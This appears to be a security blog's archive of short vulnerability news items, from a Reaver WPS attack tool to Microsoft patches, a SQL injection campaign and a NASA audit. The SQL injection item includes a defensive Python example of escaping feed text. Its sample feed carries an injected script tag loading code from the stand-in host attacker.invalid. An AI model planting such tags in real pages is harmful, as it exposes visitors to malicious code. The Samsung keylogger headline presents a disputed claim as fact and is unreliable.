A vulnerability in ASP.NET could allow an attacker to consume all of the resources on a vulnerable server with a single specially crafted HTTP request. The vulnerability affects a wide range of Web platforms, and Microsoft officials said they’re releasing the patch now because they expect exploit code to be released in the near future.
Category Archives: Vulnerabilities
Beware of password-protected documents carrying malware
“Passwords for document files are commonly used to prevent unauthorized access to the files by encrypting them with passwords. However, attackers are misusing the password feature to encrypt files, most likely to make it difficult for security products to detect them as malware,” say the researchers. “It also makes reverse-engineering the files difficult because they need to be decrypted before analysis can be performed.”
Check out Help Net Security for the full article
Attack Tool Released for WPS PIN Vulnerability
Just a day after security researcher Stefan Viehbock released details of a vulnerability in the WiFi Protected Setup (WPS) standard that enables attackers to recover the router PIN, a security firm has published an open-source tool capable of exploiting the vulnerability. The tool, known as Reaver, has the ability to find the WPS PIN on a given router and then recover the WPA passphrase for the router, as well.
The vulnerability reported by Viehbock to US-CERT is related to the way that the WPS standard handles failed authentication attempts in some cases. In those scenarios, it will send back too much detailed information to the user–or attacker–about the PIN that’s required to set up the router using WPS. Viehbock found that he was able to use that information to greatly reduce the amount of time it takes to recover the PIN for a router through a brute-force attack. Once the attacker has the WPS PIN, he can take control of the router.
The full article by Threat Post
Microsoft Security Patches for April
Patch Tuesday brings a staggering 17 security bulletins (nine of which have been given Microsoft’s highest severity rating of “critical”), addressing 64 security vulnerabilities. Software with bugs said to be fixed by the patches includes Microsoft Windows, Microsoft Office, Internet Explorer, Visual Studio and .NET Framework.
One of the vulnerabilities reportedly fixed will be the MHTML rendering flaw that was discovered earlier this year. Internet Explorer was one of the products found to be at risk from the zero-day vulnerability, which could allow maliciously crafted webpages to execute code in any “zone” regardless of which zone is specified.
Bulletin Summary
Bulletin ID | Maximum Severity Rating | Vulnerability Impact | Restart Requirement | Affected Software*
Bulletin 1 | Critical | Remote Code Execution | Requires restart | Internet Explorer on Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2.
Bulletin 2 | Critical | Remote Code Execution | Requires restart | Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2.
Bulletin 3 | Critical | Remote Code Execution | Requires restart | Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2.
Bulletin 4 | Critical | Remote Code Execution | May require restart | Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2.
Bulletin 5 | Critical | Remote Code Execution | May require restart | Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2.
Bulletin 6 | Critical | Remote Code Execution | May require restart | Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, and Office XP.
Bulletin 7 | Critical | Remote Code Execution | Requires restart | Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2.
Bulletin 8 | Critical | Remote Code Execution | May require restart | Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2.
Bulletin 9 | Critical | Remote Code Execution | Requires restart | Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2.
Bulletin 10 | Important | Remote Code Execution | May require restart | Microsoft Excel 2002, Excel 2003, Excel 2007, Excel 2010, Office 2004 for Mac, Office 2008 for Mac, Office for Mac 2011, Open XML File Format Converter for Mac, Excel Viewer, and Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats.
Bulletin 11 | Important | Remote Code Execution | May require restart | Microsoft PowerPoint 2002, PowerPoint 2003, PowerPoint 2007, PowerPoint 2010, Office 2004 for Mac, Office 2008 for Mac, Office for Mac 2011, Open XML File Format Converter for Mac, PowerPoint Viewer, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats, and PowerPoint Web App.
Bulletin 12 | Important | Remote Code Execution | May require restart | Microsoft Office XP, Office 2003, Office 2007, Office 2004 for Mac, Office 2008 for Mac, and Open XML File Format Converter for Mac.
Bulletin 13 | Important | Remote Code Execution | May require restart | Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2.
Bulletin 14 | Important | Remote Code Execution | May require restart | Microsoft Visual Studio .NET 2003, Visual Studio 2005, Visual Studio 2008, Visual Studio 2010, Visual C++ 2005 SP1 Redistributable Package, Visual C++ 2008 SP1 Redistributable Package, and Visual C++ 2010 Redistributable Package.
Bulletin 15 | Important | Information Disclosure | Requires restart | Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2.
Bulletin 16 | Important | Remote Code Execution | May require restart | Microsoft Windows XP and Windows Server 2003.
Bulletin 17 | Important | Elevation of Privilege | Requires restart | Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2.
* The list of affected software in the summary table is an abstract.
To see the full list of affected components please click on the “Advance Notification Webpage” link below and review the “Affected Software” section. Further information on the patches can be found in the advance notice that Microsoft has published on its website.
SQL Injection Attack Compromises 380,000 URLs
A massive SQL injection attack campaign has been spotted by Websense researchers, and the number of unique URLs affected by it has risen from 28,000 when first detected yesterday, to 380,000 when the researchers last checked.
The injected script redirects users that have landed on various infected pages to the domain in the script, which then redirects them further to a website simulating an anti-malware check and peddling a rogue AV solution.
Both sites are currently offline, say the researchers, but the attackers have started using other domains for redirection, and will likely keep changing them up.
The researchers also noted that some iTunes URLs have been injected with the script, but that Apple has done a good job of securing the site against this kind of attack.
“The way iTunes works is that it downloads RSS/XML feeds from the publisher to update the podcast and list of available episodes. We believe that these RSS/XML feeds have been compromised with the injected code. The good thing is that iTunes encodes the script tags, which means that the script doesn’t execute on the user’s computer,” they explained.
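The protection the researchers credit iTunes with, encoding script tags from an untrusted feed so they render as text instead of executing, is ordinary output encoding. The following is an added example written for this page; it is not Apple's or Websense's code. It parses a constructed RSS feed (the injected tag and the host name attacker.invalid are made up for the illustration) whose episode descriptions carry an injected script tag in two feed encodings, then contrasts a renderer that pastes the description straight into HTML with one that HTML-escapes it first.

```python
import html
import xml.etree.ElementTree as ET

# Constructed sample feed (not a real podcast). Both items carry the same
# injected tag: the first entity-encoded, the second wrapped in CDATA. An
# XML parser decodes both to the literal text '<script ...></script>'.
SAMPLE_FEED = """<rss version="2.0">
  <channel>
    <title>Example Podcast</title>
    <item>
      <title>Episode 1</title>
      <description>Show notes &lt;script src="http://attacker.invalid/r.js"&gt;&lt;/script&gt;</description>
    </item>
    <item>
      <title>Episode 2</title>
      <description><![CDATA[Show notes <script src="http://attacker.invalid/r.js"></script>]]></description>
    </item>
  </channel>
</rss>
"""


def parse_episodes(feed_xml):
    """Return a list of {'title', 'description'} dicts from an RSS 2.0 feed.

    The values are the decoded text the feed publisher controls, so from
    here on they must be treated as untrusted.
    """
    root = ET.fromstring(feed_xml)
    return [
        {
            "title": item.findtext("title", default=""),
            "description": item.findtext("description", default=""),
        }
        for item in root.iter("item")
    ]


def render_unsafe(episode):
    """Interpolate feed text directly into HTML: an injected tag stays live."""
    return "<h2>{}</h2><p>{}</p>".format(episode["title"], episode["description"])


def render_safe(episode):
    """HTML-escape feed text first: '<' becomes '&lt;', so the browser shows
    the tag as text and never executes it (the behaviour credited to iTunes)."""
    return "<h2>{}</h2><p>{}</p>".format(
        html.escape(episode["title"]), html.escape(episode["description"])
    )


def contains_script_tag(fragment):
    """Crude check used only to compare the two renderers' output."""
    return "<script" in fragment.lower()


if __name__ == "__main__":
    for ep in parse_episodes(SAMPLE_FEED):
        print("unsafe:", render_unsafe(ep))
        print("safe:  ", render_safe(ep))
        print("live script tag? unsafe={} safe={}".format(
            contains_script_tag(render_unsafe(ep)),
            contains_script_tag(render_safe(ep))))
```

Escaping at the point of rendering is what neutralises the payload; it does not matter how the tag was smuggled into the feed, since both the entity-encoded and the CDATA form decode to the same string before the renderer sees them.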
Samsung Intentionally Shipping Laptops with Keylogger/Spy Software
Network World published a story today by Mohamed Hassan explaining how he had purchased a new Samsung laptop recently and discovered that it had a keylogger (StarLogger) pre-installed from the factory. Not only could this software log all of your keystrokes, it is also capable of taking screenshots.
Check out the article - NetworkWorld
NASA systems dangerously at risk from cyberattack
An official audit of NASA’s network has concluded that the space agency faces a high risk of cyberattack.
Experts from the Office of the Inspector General (OIG) paint a grim picture of the state of the space agency’s server infrastructure, warning that vulnerabilities in its systems leave it open to defacement, denial of service or information-stealing attacks.
In particular, six unnamed IT systems were found to be at risk to attacks that might allow hackers to seize remote control of critical systems over the net – which included systems that control spacecraft – as a result of unpatched software vulnerabilities.
Read the full article – The Register